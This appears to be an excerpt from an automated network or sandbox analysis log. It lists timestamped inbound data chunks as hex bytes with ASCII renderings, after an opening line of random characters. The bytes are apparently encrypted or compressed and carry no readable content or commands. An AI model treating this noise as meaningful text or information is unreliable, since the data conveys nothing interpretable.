yShM'KmlhNZ:X\|)d_)iT5P0VgZfF2Q 7>Caq0gLO[l>5)@XZd mEYIh}Y]VZhK=%\|s#y;\|OmTl~@RZkA~t9?mOsIBO.z:K-q}q!thJ
2021-10-12 14:35:51 UTC	115	IN	Data Raw: 2e 91 cf 0f 02 e3 03 9b 6f 12 4d 47 53 30 33 a3 fc 88 81 47 5b a0 32 eb 8c be c2 8d 77 b0 dc dd 15 79 ab b0 23 8d 8d ec cb b9 cb 0f e9 9c 7a f1 32 6f 84 5e b6 98 52 d3 d5 09 d1 e7 3f 73 c1 67 67 94 34 dd bd d8 59 a0 de 0e 8f 30 ec 35 68 62 80 ce b9 3f e7 52 9e 91 52 7b b6 6b c5 44 3d 31 05 af b8 8a 48 cd 26 61 93 53 83 5a 24 35 61 29 6b 3f 72 53 4c f6 0b 61 97 3e 99 0c 49 c9 96 cf f9 b2 14 c9 25 e5 a3 38 4c 5f a2 d1 f9 23 72 1e 34 f9 9c ac 8a fb 2a ce 37 fa 9f 03 d1 6a b8 8a 86 8a fe 53 6e c6 c4 c2 b3 e2 c6 a3 1b 53 12 47 7b 84 8a 24 e3 9d 9a 6d b6 a4 b5 44 b9 95 f6 25 91 b2 f2 ec 5b 04 7e d6 9c 94 82 56 dd 56 c2 b9 e5 87 83 b1 e8 1a 9e 05 2f c5 83 06 61 5c 99 73 f2 66 47 ae d7 87 cf e4 e7 8e 3c 41 09 e0 6c 99 7f b1 3e 81 44 19 bf c8 be 00 1e 2c 0f f5 d1 Data Ascii: .oMGS03G[2wy#z2o^R?sgg4Y05hb?RR{kD=1H&aSZ$5a)k?rSLa>I%8L_#r4*7jSnSG{$mD%[~VV/a\sfG<Al>D,
2021-10-12 14:35:51 UTC	116	IN	Data Raw: ce 84 e0 a9 ca c3 a0 4a 1b 08 69 53 d0 ef c1 d6 51 d5 38 a5 70 bb c1 6d 62 d1 b3 ec ef 1e 69 bc ee 92 8d b3 94 5e 0b 73 f0 26 c7 53 18 41 7b be 25 29 7f 3d fc c7 d7 6e 76 38 93 75 30 3f 78 30 5d 78 7c f6 8b 4a d4 5a 98 08 eb 32 be 3f 19 aa 83 28 a9 2f 21 6e b0 60 8d ce 69 22 cc 88 e7 34 0c 55 74 97 72 51 db 02 4e 79 02 3a a1 15 e9 1e 96 8b 9b c1 2f 6c d0 be b0 11 1f 82 e0 0d d4 bb b7 fa 64 2b d0 6f ff 46 a0 50 ee 56 f7 44 1b dc 61 f0 35 92 f5 79 fd d3 cd f4 4e 4a 51 66 a1 aa 2f 20 17 b4 69 74 d5 e5 b3 47 68 59 af 08 3c 92 bb 18 7b e9 3c 7c 4e 80 bb f0 c4 5d 95 68 71 7f 68 fc 11 a1 43 44 63 48 92 00 5b d1 64 34 93 29 d2 5d 54 de cc 64 1e 7a 0a 4a 0a 1e 39 fd f2 59 10 29 a8 5c cf 18 f0 e5 1d bc 06 00 71 6d f7 c3 c8 1c 38 da 60 28 22 36 23 8e f7 f0 b1 55 87 Data Ascii: JiSQ8pmbi^s&SA{%)=nv8u0?x0]x\|JZ2?(/!n`i"4UtrQNy:/ld+oFPVDa5yNJQf/ itGhY<{<\|N]hqhCDcH[d4)]TdzJ9Y)\qm8`("6#U
2021-10-12 14:35:51 UTC	118	IN	Data Raw: 04 62 34 c5 b3 2e 32 a0 36 03 18 09 f7 5d 04 5e 42 78 73 33 92 b9 c4 57 d7 77 a3 20 4f f4 fd d2 88 6b 4c df 8a 58 7a c4 7d 34 57 90 22 1b 84 e5 28 f1 f2 3a f0 23 6e b7 a0 b7 b4 44 f7 fa 13 bd e3 3f 62 33 71 99 84 0e cd af f3 35 a1 cf 0b 95 df e8 05 94 48 ae ef 01 3b b4 1c 9e 91 58 0a 86 6e c5 55 38 2c fb ae d4 c6 69 b6 63 60 93 57 81 d1 5d 6d 49 bc 63 29 7b cc 6e 21 86 40 89 2d 9d 07 4e cb 02 86 ef 44 16 cf 53 89 80 3a 41 45 01 8f 97 cc 76 c4 34 ee 88 a0 82 ca 2c d5 c9 fb 9b e4 c5 67 a8 b1 60 88 ef 5c e5 31 d2 38 bd f3 c4 a2 2a 9b 10 76 85 96 96 2d e5 34 a4 90 b6 58 b5 58 bb 86 e5 31 ac 01 0c ed 77 0a 6c c4 5f 7d 55 f7 f0 54 d1 bc f3 8d 95 b4 f9 0e 87 e4 24 17 8a 2e f1 55 08 7f ed 0e 07 af c6 86 d6 61 a0 a3 39 6e 63 ea 79 b4 4a a1 3b 95 b8 1a ef 87 b6 17 Data Ascii: b4.26]^Bxs3Ww OkLXz}4W"(:#nD?b3q5H;XnU8,ic`W]mIc){n!@-NDS:AEv4,g`\18*v-4XX1wl_}UT$.Ua9ncyJ;
2021-10-12 14:35:51 UTC	119	IN	Data Raw: e2 5c 96 80 a2 b2 0b fe a7 df a1 38 5b 16 18 9c 43 f8 c4 ac 5a 14 d4 3e ac 49 bb d7 45 8b c3 ba 9e 79 93 6e bd ec e8 d7 ac 85 44 93 ec cf 0b f2 54 ba 5a 7e b9 3c 3d 46 93 e3 d5 23 7e 5d 0e aa 9c 22 a5 56 36 d0 7f 76 26 98 59 cb 50 af 0a c3 14 b1 17 2b 09 92 3d c9 29 35 46 08 6a 92 d7 52 12 ce 99 e0 03 b5 ab 75 b1 7c 9a cb 07 48 61 13 83 ee 3d e9 18 80 0e 8b 4c 28 6d c3 9f b2 36 18 93 7a 23 d1 37 89 58 75 0a 66 6a ec 7a 2b fe ee 5c e9 44 35 de 61 fc 0a c3 f0 79 f7 4e c1 d8 4c 66 47 61 20 8a 3c de 17 3a 75 44 c9 e6 37 56 d8 a6 50 fd 37 ae 6b 16 7b fe 26 ee 50 7e ba dd c7 7d ff 0e 66 68 e0 d6 51 d2 43 e6 72 75 9c 07 42 f9 d6 39 8c 2a 38 74 bb ec ce 19 41 f6 0d 4e 02 6b 38 de e3 61 10 37 30 4b 4e 1a f1 41 1a 12 15 14 65 44 40 d7 dc 3e 8f f2 a4 21 0a 6a 35 03 Data Ascii: \8[CZ>IEynDTZ~<=F#~]"V6v&YP+=)5FjRu\|Ha=L(m6z#7Xufjz+\D5ayNLfGa <:uD7VP7k{&P~}fhQCruB9*8tANk8a70KNAeD@>!j5
2021-10-12 14:35:51 UTC	120	IN	Data Raw: df 5f 66 2b 5a 2a 76 fa 03 b4 2e 95 85 1e 34 e3 09 fd 5f 00 59 4d 7b 08 33 83 b6 0e 4b d4 5b a0 3a 74 d6 f8 c3 8b 5b 96 de a6 5c 50 9a b4 34 5d a3 f3 44 92 cb 19 65 ca 3f f0 33 78 b5 5c 9e bf 44 e3 d6 21 8a e6 3f 79 45 94 66 85 24 dd ac f1 24 ce 2f 0f 8f 27 86 cf 94 63 a6 d7 9f 01 d5 d4 9e 91 40 43 8d 89 c7 55 32 a0 d1 ae 94 86 59 aa 72 7c 87 7f a9 25 62 32 77 a0 64 29 71 7a 6d e3 1f 43 2a 2d 9c 06 70 e4 89 31 fe 88 2d 23 5c a2 a8 29 54 49 f1 bf fc 23 70 d2 b3 e5 8f a9 8b fe 3b c3 e1 58 b3 06 cd 4f 8b 9c 83 8c f9 7e 91 3a c5 e4 98 13 d7 a6 11 53 0b 48 ad ad a2 2e e3 9d 29 97 b6 a4 b4 4c be 84 de 97 94 aa 06 c5 5d 0f 7d c7 50 ab bc d9 f6 5c ea 51 eb 9e 9a 9c 5d 0b 9b 10 09 26 93 23 e1 74 1e 70 f0 1b 14 22 d0 83 cd 9e b5 9b 28 6d a2 f6 6a bb 62 2c 3e 8b 4c Data Ascii: _f+Zv.4_YM{3K[:t[\P4]De?3x\D!?yEf$$/'c@CU2Yr\|%b2wd)qzmC-p1-#\)TI#p;XO~:SH.)L]}P\Q]&#tp"(mjb,>L
2021-10-12 14:35:51 UTC	121	IN	Data Raw: a7 0b 02 90 41 db 71 82 8a b3 0b ee 14 a5 d9 c4 cf dc 17 12 9d 4a 93 44 c2 ad 1f bb b1 a0 58 b6 d0 69 7b d2 a9 8f 6e 0f 7e a2 f5 17 c5 9e 80 4b 83 d5 ee 26 94 53 18 41 0f 5a 29 29 68 23 f1 ca 33 7c 4d 1a 93 64 39 bd ae 20 71 72 7f 1f 43 b4 2b be af 05 f8 25 b4 06 3a b4 8a dc dc 11 2a 7f be 7b 86 47 69 2a d3 93 f9 3c 00 ba 62 a4 4e a9 cb 2b 58 79 02 83 3b 3c e9 18 ad 92 8e 4c 28 73 dc ac b4 16 1f 92 e9 00 2f 36 a4 ee 75 3b 0c 32 f9 52 8c ef fd 7e e1 6e f6 db 72 f6 02 53 e4 6e f7 5e c5 e6 51 b9 50 5b a5 8d 8f df 16 98 7b 68 ce e5 23 6f 6c b9 78 09 22 aa a5 04 71 e9 27 5d 3a 7c ba dc cb 76 fd 3b 70 6e 7b f2 af d3 6e 4d 1d c4 88 13 5c dc 69 2a 9b 20 3d 4b 67 f0 30 1e 7a 58 1b 43 6d 96 2a fd f4 54 69 f0 be 74 44 75 0c e2 0b 37 19 6f a0 6e e3 dd b3 ca 9a da 66 Data Ascii: AqJDXi{n~K&SAZ))h#3\|Md9 qrC+%:{Gi<bN+Xy;<L(s/6u;2R~nrSn^QP[{h#olx"q']:\|v;pn{nM\i* =Kg0zXCm*TitDu7onf
2021-10-12 14:35:51 UTC	123	IN	Data Raw: b9 ac 73 93 ac db 27 3c 45 8b 2c 7c 2d 9a 4a 2f 95 a6 2e 6c 32 0b f7 46 7d b3 46 53 36 20 8d ad dd d7 9a 5a a0 3c 4d fe d5 df 8f 73 b4 cd ad 25 5a a9 b4 32 44 8a 2b 56 9a a4 27 ea e1 39 e1 22 7a a2 76 9b 9d 41 e5 f8 27 ac e6 39 5b da 65 67 8f 4d ea ba e0 36 b0 ce 1f 84 09 c4 2c 96 65 84 ea b8 39 dd fd 72 93 52 6c ca 48 c7 55 3e 3d eb ad fb b7 48 b6 65 66 82 47 ee 34 63 34 6b f3 6c 0c 59 4c 79 f7 01 78 9d 05 a4 0c 58 c6 52 31 e9 94 12 1d 4d a8 b3 32 59 4a e7 e2 06 dc 89 d5 2b f5 59 ba 9f fb 3a c6 df 75 04 39 2c 9a 5d 66 85 a0 ef 17 4d 38 c5 ee b0 fa d5 f5 1b 42 17 57 85 85 a6 70 e5 8b a4 82 b6 a4 b5 42 aa 90 f7 34 94 aa 0c 70 77 0a 7d ac 47 83 54 d1 f4 56 c2 b7 e9 9e 90 ae e8 0b 9a 01 15 32 82 65 f4 5c 99 76 f1 1d 13 ad dd 81 db f0 40 8e 3c 4f 1e a9 59 b9 Data Ascii: s'<E,\|-J/.l2F}FS6 Z<Ms%Z2D+V'9"zvA'9[egM6,e9rRlHU>=HefG4c4klYLyxXR1M2YJ+Y:u9,]fM8BWpB4pw}GTV2e\v@<OY
2021-10-12 14:35:51 UTC	124	IN	Data Raw: 74 ad 25 f6 fd b2 af 01 42 75 86 78 93 82 a6 de fc 84 a6 d9 ca a2 5f 6b 6e 96 52 f8 e6 c3 be 25 d0 38 4b 58 bc c3 65 65 c7 ab 9a 90 0b 24 bd ec eb c6 cc a1 5a 85 c0 97 70 f3 52 1c 49 b0 e0 28 29 6c 18 f7 d5 29 65 72 1a 83 73 2c d8 2d 20 5d 7c 75 32 67 4b c2 bf b1 16 ed 1e 99 15 2e 25 34 5f 5d 3c 21 6a a9 68 e9 5d 7b 2f c8 b1 b2 29 00 a1 08 c4 44 57 ce 04 5e 6a 7c d4 2c 3e ed 1c ec 03 8d 4c 2c 44 3d bd a3 1c 0a 91 08 1d c7 c9 89 f1 63 06 5f 7c fc dc 3f 83 6c 57 fd 68 f4 df 1a 78 1c 4e f3 51 af 4d d2 f3 20 c6 50 77 a8 b1 2a dc 6d 19 65 65 d9 f0 58 fc 7a a6 54 df ce 84 a8 1f 7e ec cf 62 41 80 bb d0 dc 73 a9 2e 75 f1 db 94 d5 d3 42 40 61 55 f3 97 57 d1 71 11 d4 22 2c 56 05 6c cf 1f 52 7e 1c 4c 79 e9 2a fd f6 40 7d a5 bd 74 4a 32 1d e1 0b 3b 03 05 ff db 9e 51 Data Ascii: t%Bux_knR%8KXee$ZpRI()l)ers,- ]\|u2gK.%4_]<!jh]{/)DW^j\|,>L,D=c_\|?lWhxNQM PwmeeXzT~bAs.uB@aUWq",VlR~Ly@}tJ2;Q
2021-10-12 14:35:51 UTC	125	IN	Data Raw: 55 3c 13 24 35 82 f7 62 f6 ac db 25 31 b0 7f 03 76 01 ee a9 02 8f 88 1b 01 e3 0f dd 16 6c d4 46 53 34 2f 19 99 fe a2 f0 47 bf 08 43 fd d5 ee 8f 73 b4 f4 fc 28 e1 aa b4 30 4a 00 1f 6b 99 ed 12 f7 dd 20 ff 1a 46 ac 5e b0 b2 1b 9d 49 08 ae e2 21 e9 13 4a 6c a3 3c d1 f3 ff 3d 89 f3 0c 8f 27 c3 4b e8 fa ad c4 be 26 d2 4f bb bc 5e 40 ba 67 da 0d 27 20 d3 83 96 9d 4c 9c 01 1e 0a 56 81 25 7d 3e fb 08 4e 25 57 64 73 e8 6f 74 82 05 b1 0e 58 ca a6 6f 86 07 04 cb 5a bd a9 a2 6d 70 d2 b1 e7 28 69 ab 27 ca a2 ab 8a ec 05 b5 b7 62 b2 06 c3 78 ae 03 a6 a7 e3 70 66 34 da 9c af e6 fd 8b 19 42 11 76 eb fb 3f 2f e5 8f bb 9d 2c 81 98 57 8c 8f fb 14 1a aa 0c ed 68 00 55 ec 44 83 52 f1 98 28 5b b9 e9 9a 8f ba 72 2e b6 15 03 24 8c 1f 6d 5c 99 73 ef 17 2a 82 d5 83 cb b5 cf f1 a5 Data Ascii: U<$5b%1vlFS4/GCs(0Jk F^I!Jl<='K&O^@g' LV%}>N%WdsotXoZmp(i'bxpf4Bv?/,WhUDR([r.$m\s*
2021-10-12 14:35:51 UTC	127	IN	Data Raw: 5a 22 df 84 5f 54 29 3d f6 fd ad dd 2e be 60 cc 52 f9 fe 3d dc 81 fb b8 ef 54 85 76 18 34 88 64 dc 40 c1 ad 15 cc 10 8c 5a bc c5 47 0e b9 23 99 6e 1a 76 8a 76 cc e9 bc b2 45 b2 e4 64 0c f2 52 01 63 4d af 28 2f 44 5a 9d 4c 28 6f 5e 05 ba e9 03 88 5e 07 42 40 56 b7 9b 4a d4 5a 98 31 e9 32 b2 3d 47 d5 1a 23 dd 39 3e 57 31 4f bf d3 5c 30 f5 b9 7c 29 00 ab 69 93 68 55 ca 01 62 02 79 32 2c 3e ed 01 ad 19 a9 61 26 4a cf 85 83 8a 0c 85 f6 01 f9 1a 8a fa 62 00 18 00 61 53 88 fa f1 6d 67 49 db d3 47 e5 26 6e 54 7b f7 4f cb d1 70 45 51 71 86 db 42 47 17 98 60 7a e1 68 06 53 74 80 4f cb 03 20 aa 15 7b e7 38 4b 7a 7c ba da fe 35 90 b5 71 7f 68 f6 6c 48 67 69 6d 71 97 2e 76 7e 77 39 8c 37 04 71 7a ef c8 35 3c 05 93 4f 02 6e 34 c3 68 67 2b 2f 9a 6b 70 3a 40 e1 0b 31 16 Data Ascii: Z"_T)=.`R=Tv4d@ZG#nvvEdRcM(/DZL(o^^B@VJZ12=G#9>W1O\0\|)ihUby2,>a&JbaSmgIG&nT{OpEQqBG`zhStO {8Kz\|5qhlHgimq.v~w97qz5<On4hg+/kp:@1
2021-10-12 14:35:51 UTC	128	IN	Data Raw: 65 14 01 e2 79 7d 17 3b 4e 4d 31 a0 1c 6b b2 be bb 0f 07 54 08 63 42 d5 22 2a 95 a0 2a 2b ce 0b f7 4a 38 23 39 ca 31 33 87 a3 b5 33 f3 76 af 1e 43 97 dd 59 89 73 b2 c1 b6 7e 55 a9 b4 32 7d f0 44 df 93 cb 0b f7 86 a5 d5 1f 65 88 41 d1 b8 eb e7 d0 09 b5 ce 12 71 36 61 4d eb 5c 57 b9 e0 34 be b6 94 aa 0c e6 0f 89 0b 8c 6b be 39 db ca 91 b9 7f 64 a5 68 ef 3f 46 b5 fa ae 90 82 23 2c 46 4d 9d 71 9e 48 42 8a 65 2d 63 32 59 56 7b f7 0d 41 e7 53 05 0d 58 c8 93 5b 62 bb 28 c4 78 bd c8 18 8b 59 d9 97 e7 06 5e e9 3c e2 89 83 e4 94 b6 d6 c9 ff ac 6d 5d 42 8f 96 a5 95 84 76 91 3c c5 ee af f1 fd 8b 19 42 11 76 eb fb 3f 2f e5 8f bb fc 2c 81 98 57 8c 8f 9a 14 67 ae 0c ed 68 1f 55 ec 44 83 52 f1 9c 28 5b b9 e9 9a 8f d9 72 2e b6 14 03 24 ef 1f fd 59 99 73 ec 35 2f ad d7 85 Data Ascii: ey};NM1kTcB"**+J8#9133vCYs~U2}DeAq6aM\W4k9dh?F#,FMqHBe-c2YV{ASX[b(xY^<m]Bv<Bv?/,WghUDR([r.$Ys5/
2021-10-12 14:35:51 UTC	129	IN	Data Raw: 4c 22 5c e7 1a 51 0c 69 9b 6a 74 8d 4a f1 fd b3 ef 2b 91 62 ca 7e b9 02 da 44 80 ff a3 f9 5f a0 5b 16 88 b2 7f ed ea e3 3c 15 d4 38 81 21 bb c3 6d 7e ef 97 9a 6e 18 43 3f 92 70 c5 b2 90 7a 17 c4 ea 0e 68 77 35 5a 46 8d ba 29 6e 30 c3 a8 2e 6f 5a 02 aa 5e 24 a5 56 0b df 06 ef 27 99 4e f4 d2 b0 1c eb a8 91 3a 3c 8d a3 b1 dd 3d 21 4e d4 6d 92 dd 67 07 e1 9b ea 2d 2a 29 0b 22 44 57 ce 27 dc 68 07 ab b7 1b c4 0f b1 a3 18 4c 28 6c f0 39 a4 16 0e 9b de 31 d3 37 8e d0 e6 54 eb 7f f8 56 a8 6b ee 56 fd f6 d3 f0 70 dc 3d db f7 79 f7 6f 5c fe 5d 47 46 5f 81 b7 3c d8 3c 1a 1a fc dc f2 27 5e ed a6 50 f7 b9 a3 85 04 5d d8 a7 63 57 7e 9a 53 d3 5f ee 3b 58 52 6e e9 57 f8 c0 3a fa 56 88 17 76 46 75 39 8c ba 09 71 69 c9 ee 88 56 7b 0a 6e 92 6d 2b fd e8 6a 2b 23 bc 72 64 98 Data Ascii: L"\QijtJ+b~D_[<8!m~nC?pzhw5ZF)n0.oZ^$V'N:<=!Nmg-*)"DW'hL(l917TVkVp=yo\]GF_<<'^P]cW~S_;XRnW:VvFu9qiV{nm+j+#rd
2021-10-12 14:35:51 UTC	130	IN	Data Raw: 5f 4d 85 10 9e 96 04 3f 60 0d b0 68 da fe d1 24 97 81 41 46 ea 70 31 6d 9d 21 4e e8 ed d6 18 71 ec 56 c9 9c c6 04 ce 76 96 27 a0 15 6f ed c0 ad b4 94 ec 25 e6 d8 7c 34 35 8a 86 fb 2b aa da 1d c9 96 1a 34 2f a6 1c 55 19 f5 ca 6f d9 28 89 49 68 73 dd a3 d6 a0 62 36 0f 86 ae 0f 0d a6 e8 ad 06 86 2c 29 90 16 a3 ac 4d 26 0c b2 10 3c 6e 00 97 87 d5 21 8a a5 e3 28 f3 99 f4 f5 8f 35 e3 48 c0 72 04 64 93 93 c8 4c 22 5c e7 1a 51 0c 53 9b 6a 74 8d 69 fe fd b3 ef 2b 91 62 ca 7e b9 02 da 44 80 ff a3 f9 65 a0 5b 16 88 b2 7f ed ea e3 06 15 d4 38 81 02 b4 c3 6d 7a ef 97 9a 6e 18 43 3f 92 70 c5 b2 90 7a 29 c4 ea 0e 68 77 35 5a 46 8d 84 29 6e 30 c3 b7 21 6f 5a 03 aa 5e 24 a5 56 0b db 06 ef 27 99 4e f4 ec b0 1c eb a8 91 3a 3f 8d a3 8f dd 3d 21 4e ce 62 92 dd 65 20 e4 b4 e8 Data Ascii: _M?`h$AFp1m!NqVv'o%\|45+4/Uo(Ihsb6,)M&<n!(5HrdL"\QSjti+b~De[8mznC?pz)hw5ZF)n0!oZ^$V'N:?=!Nbe
2021-10-12 14:35:51 UTC	131	IN	Data Raw: 9e cd 36 1f 1c 5b fc 8f 95 1e 37 1f 00 e8 02 8c 45 f6 f3 5a 8e a7 93 1f 70 fe e6 70 7c 2b f8 3c 8a 8c 8b 71 a6 cc 9a e7 3e 57 28 e6 bf b7 ca a7 68 da bb d6 f3 18 23 19 f2 20 f8 24 40 53 67 73 6f 05 3b 77 67 38 b4 53 e0 8f f1 c6 d4 cb ba 15 3a 0b 22 46 dd aa 5c 33 28 3c 04 fb 77 d0 82 5c 64 6a 08 21 c1 dc 68 ef 16 58 55 1b 01 21 f7 05 b0 0f 64 54 02 8e 0a b6 16 08 34 fb 28 53 12 ab 5e 92 9b 89 15 ee 09 da 8e 14 5d 6e 7a ae 0c e2 69 5b 31 c0 24 33 a8 81 01 64 ad db 3e 0f 02 77 2c 7c 21 df 30 50 0c a1 36 07 c3 db f7 4c 12 d7 62 7e 22 15 a3 6e d3 a9 d6 7b e2 33 5c f1 e2 e5 a5 5e b0 de a0 7c fe d5 2d 35 57 9e 1a 95 92 cb 0f 72 c4 12 e2 14 4b 7d 5e b6 98 61 8b db 09 ae f9 18 5b 1b 65 67 83 08 48 c6 79 31 a1 da 2e 5b 21 e9 29 0c 46 81 d6 9c 19 0f d5 9e 91 72 e9 Data Ascii: 6[7EZpp\|+<q>W(h# $@Sgso;wg8S:"F\3(<w\dj!hXU!dT4(S^]nzi[1$3d>w,\|!0P6Lb~"n{3\^\|-5WrK}^a[egHy1.[!)Fr
2021-10-12 14:35:51 UTC	132	IN	Data Raw: 14 bb 3e 13 c8 21 4e a1 3d 88 90 d0 99 60 0d 2a 6d d3 e7 f7 04 7c 95 69 6b c8 8c 3a 47 1b 42 ff c4 ef d2 3e fc 6e 28 50 07 e3 2d fc a5 b6 80 a0 8f 4a e0 e9 83 94 61 f3 2c ce d5 7d 3a 33 a0 1a ad 9f a9 da 1f c3 bc 64 ad 2e 3c 3d 58 fd d3 ea c7 43 0d a4 78 0f 5b 2b a3 c9 b0 6a 1c 03 86 a8 3f a7 f5 73 ac 00 a8 8e fe 09 17 a3 32 48 fc 1d 94 30 0f 4b 2d 86 81 a4 de 8a a5 f8 20 d5 95 f4 f3 bf 9f b0 d3 c1 74 2a c6 47 0a c9 4c bc 59 32 0b 77 2c 63 be 47 65 8b 1f 0e fd b3 f5 23 b3 6e ca 78 8a a8 89 df 81 f9 8d 5b b0 39 5a 16 16 b7 ab fc cc c3 37 30 f9 29 87 78 45 c3 6d 64 e7 a8 96 6e 1e 74 95 c1 eb c4 b4 be d8 fb 5d eb 0e f6 72 e2 4b 60 ad b2 0c 43 21 c5 f5 d3 6f 5a 1a a2 6a 28 a5 50 3c 75 55 74 26 9f 60 52 3f 29 1d eb 36 94 ec 2d ab 83 b8 f8 10 33 48 8b 91 92 dd Data Ascii: >!N=`m\|ik:GB>n(P-Ja,}:3d.<=XCx[+j?s2H0K- tGLY2w,cGe#nx[9Z70)xEmdnt]rK`C!oZj(P<uUt&`R?)6-3H
2021-10-12 14:35:51 UTC	134	IN	Data Raw: 79 19 a8 e6 63 94 82 48 86 1d c1 dd 82 9c 39 17 d2 9a cd 2f bd f0 dc e8 5b 91 84 9b 22 62 fe e0 44 d2 78 63 3d 8c a2 2d c1 3f cd 9a 79 3b 66 3b c0 9f e3 ef 8a 7a dc 2d c0 f2 18 3c 1b c2 1d fa 24 59 58 c9 20 f4 04 3d 59 c1 89 2d 52 e0 11 f4 f6 c7 ed 9a 40 1f 26 30 40 25 bd 5d 33 37 3e 15 c6 75 d0 9b 7f ca 39 93 20 c7 f2 ce 41 8f 59 55 85 04 12 e4 23 90 45 41 79 10 88 d0 a2 17 08 2b f8 42 6e 10 ab 47 ab 35 da 8e ef 0f f4 2c bb c4 6f 7a 30 09 d0 7a 7d 11 8b 01 1e b9 87 3c 70 ac db 21 0a 7f 4a 2e 7c 3c dd 9b 2c 95 a6 1c 85 9d 90 f6 4c 16 6d 67 52 30 33 19 99 fe bb f0 7b 80 39 5c f1 dd 99 9d 73 b2 c1 a9 7e 55 a9 b4 32 7d 18 44 df 93 cb 0b c8 c0 3e f0 32 f1 8b 73 a7 be 61 c2 d1 09 ae c6 56 63 36 67 79 ad 0f cc b8 e6 1a 27 a0 97 8e 21 ed 09 b4 62 ac c4 20 1c f6 Data Ascii: ycH9/["bDxc=-?y;f;z-<$YX =Y-R@&0@%]37>u9 AYU#EAy+BnG5,oz0z}<p!J.\|<,LmgR03{9\s~U2}D>2saVc6gy'!b
2021-10-12 14:35:51 UTC	135	IN	Data Raw: b9 07 cd 29 f1 07 bb 38 26 6e 77 fa a2 3d 8a 9a a2 e7 f9 0c b0 4c de b4 d0 24 88 0f 4c 46 fa 56 17 05 1a 5f d7 c9 fd c0 38 d6 f3 45 e1 2b e1 29 da 7a 30 fe 39 14 6f c9 d8 e6 b5 94 f3 b6 eb d8 6c 12 13 e3 01 85 b2 8b f9 0b e9 3e 05 10 07 11 3b 78 0d f9 6c b9 40 29 89 6d 09 3f dc a3 c9 2a 6f 36 1f a0 88 61 8e d8 71 8c 41 90 0c 80 8f 09 8b 1b 6a 0b 1b be b6 eb f7 01 97 a3 a4 6c 8b a5 f8 9a fb b6 e6 d5 85 f2 9c d1 c1 52 66 56 39 93 d7 68 90 54 c8 0b 71 06 7f e5 f3 75 ad 3b d6 bb b2 f5 03 26 45 e7 6a b5 a0 e2 dc 81 ff 87 53 dc a0 5b 09 31 bf 7f fe cc c5 87 93 aa a1 a0 58 b8 e3 2a 65 c7 ba 02 4b 33 7b 9b cc ae c5 b2 94 7a 28 d6 ea 0e ed 76 30 66 62 ad 2e 03 e8 4e 7a d4 29 6b 7a 52 83 73 26 3f 75 0c 4f 5e 56 6e 98 4a d4 61 61 0e eb 32 ab 18 05 86 81 22 db 17 a7 Data Ascii: )8&nw=L$LFV_8E+)z09ol>;xl@)m?o6aqAjlRfV9hTqu;&EjS[1XeK3{z(v0fb.Nz)kzRs&?uO^VnJaa2"
2021-10-12 14:35:51 UTC	136	IN	Data Raw: e4 7c 50 0c 1f 50 34 aa 7c 40 93 11 10 3f 74 c0 d9 a2 a7 55 02 d2 00 f6 2a 81 d4 fc f5 70 13 fa 22 33 72 fa c0 33 fb 55 61 a7 af a5 ba 99 86 a5 9b 7d 1b 5a 4f d5 9f 79 d4 8f 45 f8 0d da d9 9a 42 a2 db 0d fe 04 2c 78 e1 0d 6c 21 16 62 61 d7 de 52 e0 15 f4 96 d3 ed 9a c0 12 26 20 66 03 8a de 4d ae 1f 2c d2 55 bb 85 76 e2 8e b4 0d d0 fe 68 54 17 58 55 a1 a5 19 e5 23 8a f7 49 56 02 a8 da 3e 68 91 2a d8 04 5e 7c aa 58 b8 87 d2 a1 fe 2f fe c2 c4 5d 6e 5a b1 3c cf 7b 66 39 3c 26 33 ae 8b 9a 11 34 da 21 2e 0a 37 2f 7c 27 6f 93 03 87 86 16 6e e2 09 f7 6c 98 58 47 53 2f 38 ab 91 d1 a9 d0 71 26 46 c5 f0 fd c7 ad 1d b3 de a6 cc 5d 86 a6 12 77 f4 3b 46 92 eb 9a fd e1 3f ef 3e 43 83 5c b6 9e 6b 65 ae 90 af e6 3b 53 59 66 67 85 b8 eb 95 f2 16 81 b1 0f 8f 21 c9 88 83 63 Data Ascii: \|PP4\|@?tUp"3r3Ua}ZOyEB,xl!baR& fM,UvhTXU#IV>h^\|X/]nZ<{f9<&34!.7/\|'onlXGS/8q&F]w;F?>C\ke;SYfg!c
2021-10-12 14:35:51 UTC	137	IN	Data Raw: 55 f8 0f 1c 06 92 81 b3 90 1c 16 bf 18 b6 4b 5f d7 3a 18 a1 a2 02 b9 ef 0c b0 48 de 5c c6 24 88 8a 7a 43 c5 72 37 41 31 d9 a9 70 ec d2 3c f6 7c 57 c9 06 79 0c f1 42 90 a0 30 14 6f cd d8 18 a3 94 f3 33 c7 dd 53 36 33 a6 2a 03 cc 32 db 19 ed 1e 8b 35 2f 3c a3 5d 26 c1 cc e7 48 29 89 69 09 bd ca a3 c9 af 44 33 20 84 a8 23 a5 5e 0f 35 07 82 08 a0 02 17 a3 36 f2 2e 30 86 16 b5 fc 01 97 a7 a4 fd 9d a5 f8 1f d2 b3 d9 f1 a5 b1 b7 53 bf eb 01 44 3d b3 5b 4d b8 79 50 2e 5a 3d df bb f9 75 ad 3f d6 1d a4 f5 03 a5 48 e7 7a 93 86 8e 5f ff 66 a6 d9 ca 80 cf 17 12 97 c8 d9 e1 d2 8b 35 40 39 a1 58 9c 20 7a 64 c7 a1 b0 43 1c 69 bb c6 6b ba 2b 95 5a 81 e4 7f 0f f2 52 82 6e 4d bc 0e 09 fb 31 e3 d5 09 87 4d 1a 82 6e 0e 88 52 21 5b 52 f4 58 00 4b d4 45 90 8a ea 32 b4 8d 08 86 Data Ascii: UK_:H\$zCr7A1p<\|WyB0o3S63*25/<]&H)iD3 #^56.0SD=[MyP.Z=u?Hz_f5@9X zdCik+ZRnM1MnR![RXKE2
2021-10-12 14:35:51 UTC	139	IN	Data Raw: 09 db 41 34 f3 e7 7c 52 06 f5 2f ad ab e6 61 9e b6 37 1f 1c 5b fc 8f 96 1e 37 64 01 e8 02 8c 83 e5 f3 5a 8c ac 96 30 72 f8 ca d8 84 cc 60 3d 8e a8 1c be a6 cc 00 58 36 6b 1c e0 28 78 ca a7 48 a6 14 dc f3 0f 14 16 d8 0d fc 0e c4 07 78 0c f6 00 1b cb 46 f7 b4 c9 c5 38 c5 cd e6 55 9b da 3a 2b 7f 7f 05 a0 40 1b 1a 1c 2c d0 5f 52 fa ef e3 14 95 00 78 d9 48 3f 8c 7d 78 90 02 2c 5c 22 90 df 44 37 1b ae f0 a1 3e 25 29 d8 06 54 92 d5 c1 b9 1d f3 ac 55 08 de ae 5f 78 43 6b 12 09 75 7a 7d 11 31 4e 2a a8 a1 00 47 80 d9 21 2c 00 d8 50 e5 26 f5 b2 0e 2e a1 36 03 